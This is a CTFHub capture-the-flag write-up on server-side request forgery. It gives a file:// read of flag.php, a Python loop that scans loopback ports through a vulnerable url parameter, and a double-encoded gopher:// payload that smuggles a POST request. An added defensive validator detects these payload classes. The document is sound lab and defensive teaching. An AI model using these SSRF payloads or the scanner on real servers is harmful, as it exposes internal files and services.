CTFHub
Internal network access
Request the server's local flag.php file directly
Reading files via pseudo-protocol (file:// wrapper)
file:///var/www/html/flag.php
Port scanning
Requesting a port that is not open returns no content
Probe for open ports
# port.py
import requests

# A closed port gives an empty response body through the SSRF endpoint,
# so the first non-empty response marks the open port.
for i in range(8000, 9001):
    url = f"http://challenge-80bae7467b23066f.sandbox.ctfhub.com:10800/?url=http://127.0.0.1:{i}"
    print(f"[{i}]" + url)
    res = requests.get(url=url)
    if len(res.content) != 0:
        print(i)
        break
POST request (gopher)
The server has to be made to send the POST request itself
Visit flag.php and capture the request in Burp Suite to obtain the key
?url=http://127.0.0.1/flag.php
Construct the POST request
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
key=7c1031172cade4f3a5eb3fe0417dbd1f
Edit the URL in HackBar and URL-encode the POST content. Note the port 80 in gopher://127.0.0.1:80/_POST
and the _ before POST.
http://challenge-e3cab89d8da742f6.sandbox.ctfhub.com:10800/
?url=gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
key=7c1031172cade4f3a5eb3fe0417dbd1f
URL-encode the POST request; each line break is encoded as %0A, so add %0D
in front of every %0A (the HTTP request needs CRLF line endings).
http://challenge-e3cab89d8da742f6.sandbox.ctfhub.com:10800/
?url=gopher://127.0.0.1:80/_POST%20%2Fflag.php%20HTTP%2F1.1%0D%0AHost%3A%20127.0.0.1%0D%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A%2036%0D%0A%0D%0Akey%3D7c1031172cade4f3a5eb3fe0417dbd1f
Encode once more (second round of URL encoding, since the target server decodes the url parameter again)
http://challenge-e3cab89d8da742f6.sandbox.ctfhub.com:10800/
?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D7c1031172cade4f3a5eb3fe0417dbd1f
Submit the request and retrieve the flag
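Added example on the defensive side (not part of the CTFHub write-up): a check for the url parameter that catches the three payload classes above, file:// reads, loopback port probing and double-encoded gopher:// requests, and records the smuggled request line for the alert. The sample inputs are constructed from the write-up's payloads; the function names are my own.

```python
import ipaddress
from urllib.parse import urlsplit, unquote

ALLOWED_SCHEMES = {"http", "https"}

def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Undo nested percent-encoding (the write-up double-encodes) until it stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_internal_host(host: str) -> bool:
    """True for loopback, private, link-local or unspecified addresses, or localhost."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() in {"localhost", "localhost.localdomain"}
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified

def check_url_param(value: str) -> dict:
    """Verdict for one ?url= value: {"allowed", "reason", "scheme", "host"}."""
    decoded = fully_decode(value)
    parts = urlsplit(decoded)
    scheme = parts.scheme.lower()
    host = parts.hostname or ""
    if scheme not in ALLOWED_SCHEMES:
        reason = f"scheme {scheme!r} not allowed"
        if scheme == "gopher" and "/_" in decoded:
            # Bytes after "/_" go to the target verbatim; log the first line
            # (e.g. "POST /flag.php HTTP/1.1") so the alert shows what was smuggled.
            smuggled = decoded.split("/_", 1)[1].split("\r\n", 1)[0]
            reason += f", smuggled request line: {smuggled!r}"
        return {"allowed": False, "reason": reason, "scheme": scheme, "host": host}
    if is_internal_host(host):
        return {"allowed": False, "reason": f"internal target {host}", "scheme": scheme, "host": host}
    return {"allowed": True, "reason": "ok", "scheme": scheme, "host": host}

if __name__ == "__main__":
    # Constructed sample inputs modelled on the payloads in the write-up above.
    for s in ["file:///var/www/html/flag.php", "http://127.0.0.1:8080",
              "gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520127.0.0.1",
              "https://example.com/image.png"]:
        print(check_url_param(s))
```

This only inspects the literal value; hostnames that resolve to internal addresses (DNS rebinding), redirects, and alternative IP spellings still need a check at resolution time.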